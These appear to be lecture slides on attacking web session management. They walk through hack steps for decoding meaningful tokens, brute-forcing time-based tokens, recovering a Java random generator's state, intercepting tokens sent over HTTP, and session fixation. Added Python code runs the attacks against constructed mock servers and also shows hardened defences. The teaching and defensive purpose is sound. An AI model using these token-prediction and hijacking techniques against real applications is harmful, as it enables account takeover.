
Chapter 7

Attacking Session Management

Juliette Lessing
Session management

Enables the application to uniquely identify a given user across a number of different requests.

A prime target for malicious attacks against the application.

Defects in it are commonly encountered.
Two types of weaknesses

Weaknesses in session token generation

Weaknesses in the handling of session tokens throughout their lifecycle
Weaknesses in Session Token
Generation
Meaningful tokens (1)
Created using a transformation of the user's user name or other information associated with them.

Such tokens may look opaque at first glance, but actually:
Meaningful tokens (2)
Exhibit some structure allowing an attacker to understand their function and means of generation.

Typical components:

User name
E-mail address
Client's IP address
Meaningful tokens (3)
Hack steps:
Obtain a single token from the application and modify it to determine which parts the server actually checks. Change the token's value one byte at a time and check whether the modified token is still accepted. If some portions are not required to be correct, exclude them from further analysis.

Log in as several different users at different times and record the tokens received from the server.

Analyze the tokens for any correlations that appear to be related to the username and other user-controllable data.

Analyze the tokens for any detectable encoding or obfuscation.

If any meaning can be reverse engineered from the sample of session tokens, guess the tokens of other users, find a page of the application that is session-dependent, and make large numbers of requests to this page using the guessed tokens. Monitor the results for any case where the page is loaded correctly, indicating a valid session token.
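The first, third and fourth hack steps above, as an added example that is not part of the original slides: a sample "meaningful" token is constructed (base64 over a record of user name, e-mail and client IP), an encoding peeler strips recognisable layers, a component finder reports what an attacker would recognise in the decoded bytes, and a probe mutates the token one base64 symbol at a time against an oracle standing in for "does the session page still load?". The mock server behind that oracle is constructed too: it only checks the user field, which is exactly the kind of unchecked remainder the first step is meant to reveal.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample: a "meaningful" token that is just base64 over a
# semicolon-separated record of user name, e-mail address and client IP.
SAMPLE_RECORD = b"user=alice;email=alice@example.com;ip=10.0.0.5;role=user"
SAMPLE_TOKEN = base64.b64encode(SAMPLE_RECORD).decode()

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def peel_encodings(token, max_depth=5):
    """Strip recognisable encoding layers (URL, hex, base64) one at a time.
    Returns [(layer_name, decoded_bytes), ...] in the order they were removed."""
    layers = []
    current = token.encode("latin-1") if isinstance(token, str) else bytes(token)
    for _ in range(max_depth):
        text = current.decode("latin-1")
        if "%" in text and unquote(text) != text:
            current = unquote(text).encode("latin-1")
            layers.append(("url", current))
        elif re.fullmatch(r"[0-9a-fA-F]+", text) and len(text) % 2 == 0:
            current = binascii.unhexlify(text)
            layers.append(("hex", current))
        elif re.fullmatch(r"[A-Za-z0-9+/=_-]+", text) and len(text) % 4 == 0:
            try:
                current = base64.b64decode(
                    text.replace("-", "+").replace("_", "/"), validate=True)
            except (binascii.Error, ValueError):
                break
            layers.append(("base64", current))
        else:
            break
    return layers


def find_components(decoded, known_username=None):
    """Report the user-related components visible in the decoded token."""
    found = {}
    if known_username and known_username.encode() in decoded:
        found["username"] = known_username
    m = EMAIL_RE.search(decoded)
    if m:
        found["email"] = m.group().decode()
    m = IPV4_RE.search(decoded)
    if m:
        found["ip"] = m.group().decode()
    return found


def mutate_base64_symbol(token, i):
    """Replace the i-th base64 symbol with its 6-bit complement, so every bit
    it carries changes while the token stays decodable; padding is skipped."""
    ch = token[i]
    if ch not in B64_ALPHABET:
        return None
    return token[:i] + B64_ALPHABET[B64_ALPHABET.index(ch) ^ 0x3F] + token[i + 1:]


def probe_required_positions(token, accepted, mutate=mutate_base64_symbol):
    """Hack step 1: change one symbol at a time and ask the oracle whether the
    token is still accepted. Returns the positions that must stay intact;
    everything else is unchecked by the server and can be ignored."""
    required = []
    for i in range(len(token)):
        mutated = mutate(token, i)
        if mutated is not None and not accepted(mutated):
            required.append(i)
    return required


def make_oracle(valid_user):
    """Constructed stand-in for 'does the session page load?': the mock server
    decodes the token and checks only the user field."""
    def accepted(token):
        try:
            record = base64.b64decode(token)
        except (binascii.Error, ValueError):
            return False
        return b"user=" + valid_user in record.split(b";")
    return accepted
```

Against the sample token the probe reports only the first 15 base64 symbols as required: those are the symbols that carry the bytes of `user=alice;`, so the e-mail, IP and role fields can be altered freely, which also tells the attacker that the token carries no integrity protection.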
Weaknesses in Session Token
Generation
Predictable tokens (1)
Contain sequences or patterns that allow an attacker to extrapolate other valid tokens.
These arise from three different sources:

1. Concealed sequences
2. Time dependency
3. Weak random number generation
Predictable tokens (2)
1. Concealed sequences

Predictable tokens (2)
2. Time dependency

Attack:
Start polling the server to obtain new session tokens in quick succession.
Monitor the increments in the first number. Does it increase by more than one? Then a token has been issued to another user in between our polls.
We know the upper and lower bounds of the second number (the timestamp) that was issued to that user, because it lies between the timestamps of our two polls.
Brute-force the small range of candidate tokens against a protected page until one successfully accesses it.
Running this scripted attack continuously will enable us to capture the session token of every other application user.
When an administrative user logs in, we will fully compromise the entire application.
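A simulation of this attack, added here and not part of the original slides. The server, its token format (`<sequence>-<issue time in milliseconds>`) and the schedule of other users' logins are all constructed; the attacker code polls, detects sequence jumps, and brute-forces the skipped sequence numbers over the timestamp window bounded by its own two polls.

```python
class MockServer:
    """Constructed application whose tokens are '<sequence>-<issue time ms>'."""

    def __init__(self, start_seq=1000, start_ms=1_600_000_000_000):
        self.seq = start_seq          # increments once per token issued
        self.clock_ms = start_ms      # simulated wall clock
        self.sessions = {}            # token -> user

    def tick(self, ms):
        self.clock_ms += ms

    def issue(self, user):
        self.seq += 1
        token = f"{self.seq}-{self.clock_ms}"
        self.sessions[token] = user
        return token

    def protected_page(self, token):
        """Stand-in for requesting a session-dependent page: the owner's name
        when the token is valid, None when the page fails to load."""
        return self.sessions.get(token)


def parse_token(token):
    seq, ms = token.split("-")
    return int(seq), int(ms)


def attack(server, schedule):
    """Poll for fresh tokens; whenever the sequence number jumps by more than
    one, brute-force the skipped numbers over the timestamps between our two
    polls. `schedule` is a constructed list of (elapsed_ms, victim_or_None)
    describing what happens between consecutive polls. Returns the hijacked
    {token: owner} mapping and how many guesses were needed."""
    hijacked = {}
    requests = 0
    prev_seq, prev_ms = parse_token(server.issue("attacker"))
    for elapsed, victim in schedule:
        server.tick(elapsed // 2)
        if victim is not None:
            server.issue(victim)       # another user logs in between our polls
        server.tick(elapsed - elapsed // 2)
        seq, ms = parse_token(server.issue("attacker"))
        for missing_seq in range(prev_seq + 1, seq):
            # The victim's timestamp lies between our two polls, so there are
            # at most (ms - prev_ms + 1) candidates per skipped sequence number.
            for ts in range(prev_ms, ms + 1):
                requests += 1
                guess = f"{missing_seq}-{ts}"
                owner = server.protected_page(guess)
                if owner is not None:
                    hijacked[guess] = owner
                    break
        prev_seq, prev_ms = seq, ms
    return hijacked, requests
```

With the constructed schedule below, two victims ("admin" and "bob") log in between polls a few hundred milliseconds apart, and both tokens are recovered with a few hundred requests in total; in a real engagement the window is the interval between your own polls, so polling faster shrinks the brute-force range.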
Predictable tokens (3)
3. Weak random number generation

This algorithm takes the last number generated, multiplies it by one constant, and adds another constant, to obtain the next number. The number is truncated to 48 bits, and the algorithm shifts the result to return only the number of bits that were requested.
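The generator described above, as an added example that is not part of the original slides. The constants are those of Java's `java.util.Random`, whose linear congruential generator the description matches; the attack assumes the attacker observes consecutive 32-bit outputs (for example tokens built from `nextInt()`). Because each output exposes the top 32 bits of a 48-bit state, only 16 bits remain to brute-force, after which every future output is known.

```python
# Constants of the 48-bit LCG in java.util.Random.
MULTIPLIER = 0x5DEECE66D
ADDEND = 0xB
MASK = (1 << 48) - 1


class LCG48:
    """Re-implementation of the generator: multiply the last state by one
    constant, add another, truncate to 48 bits, then shift right so that
    only the requested number of top bits is returned."""

    def __init__(self, seed):
        # java.util.Random scrambles the caller's seed with the multiplier
        self.state = (seed ^ MULTIPLIER) & MASK

    def next_bits(self, bits):
        self.state = (self.state * MULTIPLIER + ADDEND) & MASK
        return self.state >> (48 - bits)

    def next_u32(self):
        # The same 32 bits nextInt() returns (Java just interprets them as signed).
        return self.next_bits(32)


def recover_state(observed):
    """Given two or more consecutive 32-bit outputs, brute-force the 16 low
    bits the generator discarded from the state behind the first output and
    keep every candidate that reproduces all following outputs. Returns the
    matching 48-bit states as they stood after the last observed output."""
    first, rest = observed[0], observed[1:]
    matches = []
    for low in range(1 << 16):
        state = (first << 16) | low
        for expected in rest:
            state = (state * MULTIPLIER + ADDEND) & MASK
            if state >> 16 != expected:
                break
        else:
            matches.append(state)
    return matches


def predict(observed, count=1):
    """Predict the next `count` 32-bit outputs, or None if the observations
    do not pin down a single state."""
    matches = recover_state(observed)
    if len(matches) != 1:
        return None
    state = matches[0]
    predictions = []
    for _ in range(count):
        state = (state * MULTIPLIER + ADDEND) & MASK
        predictions.append(state >> 16)
    return predictions
```

Two outputs already leave only about one false candidate in 2^16 (the 32-bit check against 16 unknown bits); a third observation removes that residual ambiguity, which is why `recover_state` accepts any number of consecutive values.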
Weaknesses in Session Token
Handling
Disclosure of tokens on the network (1)

Weaknesses occur when:

Some applications elect to use HTTPS to protect the user's credentials during login but then revert to HTTP for the remainder of the user's session.
Some applications use HTTP for preauthenticated areas of the site, such as the site's front page, but switch to HTTPS from the login page onwards.
Disclosure of tokens on the network (2)

Hack steps:
Walk through the application in the normal way and identify the login functions and the transitions between HTTP and HTTPS communications.

Are HTTP cookies used as the transmission mechanism? Verify whether the secure flag is set.

Determine whether session tokens are ever transmitted over an unencrypted connection. If yes, regard them as vulnerable to interception.

Verify whether a new token is issued following login, or whether a token transmitted during the HTTP stage is still being used to track the user's authenticated session.

Verify whether the server is listening on port 80. If so, visit any HTTP URL directly from within an authenticated session and verify whether the session token is transmitted.

In cases where a token for an authenticated session is transmitted to the server over HTTP, verify whether that token continues to be valid or is immediately terminated by the server.
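The network-disclosure checks above, as an added example that is not part of the original slides. It works over a constructed capture of a walk through a fictitious application (URLs, cookie name `SESSIONID` and token values are all invented): for the session cookie it reports a missing `Secure` flag, issue over plain HTTP, transmission over plain HTTP, and a token that is not rotated at login.

```python
from urllib.parse import urlsplit

SESSION_COOKIE = "SESSIONID"                 # assumed name of the session cookie
LOGIN_URL = "https://shop.example/login"     # assumed login endpoint

# Constructed capture: per request, the URL, the Cookie header the client
# sent (None if none) and the Set-Cookie headers the server returned.
CAPTURE = [
    {"url": "http://shop.example/", "cookie": None,
     "set_cookie": ["SESSIONID=7f3a9c; Path=/"]},
    {"url": "https://shop.example/login", "cookie": "SESSIONID=7f3a9c",
     "set_cookie": []},
    {"url": "https://shop.example/account", "cookie": "SESSIONID=7f3a9c",
     "set_cookie": []},
    {"url": "http://shop.example/help", "cookie": "SESSIONID=7f3a9c",
     "set_cookie": []},
]

# The same walk against a corrected deployment: HTTPS only, Secure and
# HttpOnly set, and a fresh token issued in the login response.
FIXED_CAPTURE = [
    {"url": "https://shop.example/", "cookie": None,
     "set_cookie": ["SESSIONID=7f3a9c; Path=/; Secure; HttpOnly"]},
    {"url": "https://shop.example/login", "cookie": "SESSIONID=7f3a9c",
     "set_cookie": ["SESSIONID=e21b04; Path=/; Secure; HttpOnly"]},
    {"url": "https://shop.example/account", "cookie": "SESSIONID=e21b04",
     "set_cookie": []},
]


def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, {attribute: value|True})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.lower()] = val if val else True
    return name, value, attrs


def cookie_value(cookie_header, name):
    """Value of `name` in a request Cookie header, or None."""
    if not cookie_header:
        return None
    for part in cookie_header.split(";"):
        key, _, val = part.strip().partition("=")
        if key == name:
            return val
    return None


def audit(capture, session_cookie, login_url):
    """Return (finding, url) pairs for the disclosure checks described above."""
    findings = []
    pre_login = None
    logged_in = False
    for step in capture:
        url = step["url"]
        scheme = urlsplit(url).scheme
        for raw in step["set_cookie"]:
            name, _, attrs = parse_set_cookie(raw)
            if name != session_cookie:
                continue
            if "secure" not in attrs:
                findings.append(("no-secure-flag", url))
            if scheme == "http":
                findings.append(("issued-over-http", url))
        sent = cookie_value(step["cookie"], session_cookie)
        if sent is None:
            continue
        if scheme == "http":
            findings.append(("sent-over-http", url))
        if url == login_url:
            pre_login, logged_in = sent, True
        elif logged_in and pre_login is not None and sent == pre_login:
            # The pre-authentication token is still tracking the logged-in session.
            findings.append(("not-rotated-on-login", login_url))
            pre_login = None   # report once
    return findings
```

The audit is deliberately offline: feed it the request/response pairs recorded by an intercepting proxy rather than having it contact the target, so the same logic can be rerun on a saved capture when the findings are written up.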
Weaknesses in Session Token
Handling
Disclosure of tokens in logs

Causes of session tokens appearing in system logs
Weaknesses in Session Token
Handling
Vulnerable session termination (1)
Some applications do not provide effective logout functionality:
A logout function is not implemented.
The logout function does not actually cause the server to invalidate the session.
When a user clicks Logout, this fact is not communicated to the server at all, and so the server performs no action whatsoever.
Vulnerable session termination (2)

Hack steps:
Investigate whether session expiration is implemented on the server side.

Determine whether a logout function exists and is prominently made available to users. If not, users are more vulnerable because they have no means of causing the application to invalidate their session.

Where a logout function is provided, test its effectiveness. After logging out, attempt to reuse the old token and determine whether it is still valid. If so, users remain vulnerable to some session hijacking attacks even after they have logged out.
Weaknesses in Session Token
Handling
Client Exposure to Token Hijacking
Hack steps (1):

Identify any cross-site scripting vulnerabilities within the application and determine whether these can be exploited to capture the session tokens of other users.

If the application issues session tokens to unauthenticated users, obtain a token and perform a login.

Hack steps (2):

Check whether the application is willing to return to the login page even though you are already authenticated; submit another login as a different user using the same token. If the application does not issue a fresh token after either login, it is vulnerable to session fixation.

Identify the format of session tokens used by the application. Modify your token to an invented value that is validly formed, and attempt to log in. If the application allows you to create an authenticated session using an invented token, then it is vulnerable to session fixation.
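The session-fixation hack steps above, as an added example that is not part of the original slides. Both applications are constructed: `VulnerableApp` keeps the pre-authentication token across login and adopts any well-formed token it has never issued, `HardenedApp` issues a fresh token at every login and never adopts a client-supplied value. The test harness runs the two checks (no rotation at login or re-login, and login with an invented token) against either.

```python
import secrets

# Constructed user database; the password check is not the point here.
USERS = {"victim": "victim-pw", "other": "other-pw"}
TOKEN_HEX_LEN = 32


def check_password(user, password):
    stored = USERS.get(user)
    return stored is not None and secrets.compare_digest(stored, password)


def well_formed(token):
    return (len(token) == TOKEN_HEX_LEN
            and all(c in "0123456789abcdef" for c in token))


class VulnerableApp:
    """Issues tokens to anonymous visitors, marks the same token authenticated
    at login, and treats an unknown but well-formed token as a new session."""

    def __init__(self):
        self.sessions = {}   # token -> user, or None while anonymous

    def visit(self, token=None):
        if token in self.sessions:
            return token
        if not (token and well_formed(token)):
            token = secrets.token_hex(16)
        self.sessions[token] = None   # defect: a client-chosen token is adopted
        return token

    def login(self, token, user, password):
        if not check_password(user, password):
            return None
        token = self.visit(token)
        self.sessions[token] = user   # defect: the fixed token is now authenticated
        return token

    def whoami(self, token):
        return self.sessions.get(token)


class HardenedApp(VulnerableApp):
    def visit(self, token=None):
        if token in self.sessions:
            return token
        token = secrets.token_hex(16)   # never adopt a value the server did not issue
        self.sessions[token] = None
        return token

    def login(self, token, user, password):
        if not check_password(user, password):
            return None
        self.sessions.pop(token, None)  # whatever the client presented is dead now
        fresh = secrets.token_hex(16)
        self.sessions[fresh] = user
        return fresh


def fixation_test(app):
    """Run the hack steps and report what was observed."""
    fixed = app.visit()                                  # attacker obtains a token
    after = app.login(fixed, "victim", "victim-pw")      # victim logs in with it
    rotates = after != fixed and app.whoami(fixed) is None
    again = app.login(after, "other", "other-pw")        # re-login while authenticated
    rotates_again = again != after
    invented = "f" * TOKEN_HEX_LEN                       # validly formed, never issued
    got = app.login(invented, "victim", "victim-pw")
    adopts_invented = got == invented and app.whoami(invented) == "victim"
    return {"rotates_on_login": rotates,
            "rotates_on_second_login": rotates_again,
            "adopts_invented_token": adopts_invented}
```

The hardened version fails both checks on purpose: once the attacker's pre-chosen token can never become an authenticated one, a link or cookie planted in the victim's browser is worthless.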
Securing Session Management

In order to perform session management in a secure manner:

1. Generate strong tokens

2. Protect tokens throughout their lifecycle
Tokens should only ever be transmitted over HTTPS.
Tokens should never be transmitted in the URL.
Logout functionality should be implemented.
Session expiration should be implemented after a suitable period of inactivity (e.g., 10 minutes).
Etc.
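A server-side session store that follows the two recommendations above, as an added example that is not part of the original slides; it also serves the session-termination hack steps earlier on the page, since the same harness distinguishes a logout that destroys the server record from one that only tells the client it worked. Everything here is constructed: the store, the deliberately broken subclass and the fake clock used to fast-forward idle time.

```python
import secrets
import time

IDLE_TIMEOUT_SECONDS = 10 * 60   # the "suitable period of inactivity" above


class SessionStore:
    """Strong random tokens, a logout that actually destroys the record, and
    idle expiry enforced by the server rather than by the cookie's lifetime."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._sessions = {}   # token -> {"user": ..., "last_seen": ...}

    def create(self, user):
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[token] = {"user": user, "last_seen": self._clock()}
        return token

    def lookup(self, token):
        """Return the user for a live token, or None. Expired sessions are
        destroyed on the server, not merely refused."""
        record = self._sessions.get(token)
        if record is None:
            return None
        now = self._clock()
        if now - record["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[token]
            return None
        record["last_seen"] = now
        return record["user"]

    def logout(self, token):
        # Removing the server-side record is what makes the old token unusable.
        return self._sessions.pop(token, None) is not None


class BrokenLogoutStore(SessionStore):
    """The defect described earlier: 'Logout' only clears the cookie on the
    client; the server keeps the session alive and the old token still works."""

    def logout(self, token):
        return token in self._sessions   # reports success, changes nothing


class FakeClock:
    """Constructed clock so idle time can be fast-forwarded deterministically."""

    def __init__(self):
        self.t = 0.0

    def now(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def termination_test(store, clock):
    """The termination hack steps: is the old token still valid after logout,
    and does an idle session expire on the server?"""
    token = store.create("alice")
    store.logout(token)
    valid_after_logout = store.lookup(token) is not None

    token = store.create("alice")
    clock.advance(IDLE_TIMEOUT_SECONDS + 1)
    expires_when_idle = store.lookup(token) is None
    return {"old_token_valid_after_logout": valid_after_logout,
            "expires_when_idle": expires_when_idle}
```

`secrets.token_urlsafe` draws from the operating system's CSPRNG, which is what "generate strong tokens" means in practice; the store never derives a token from the user name, time or a seeded general-purpose PRNG, so none of the generation weaknesses earlier on the page apply.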
Securing Session Management

Per-page tokens
A new token is issued every time the user requests a page, and a request carrying a superseded token is rejected.
Prevents session fixation attacks.
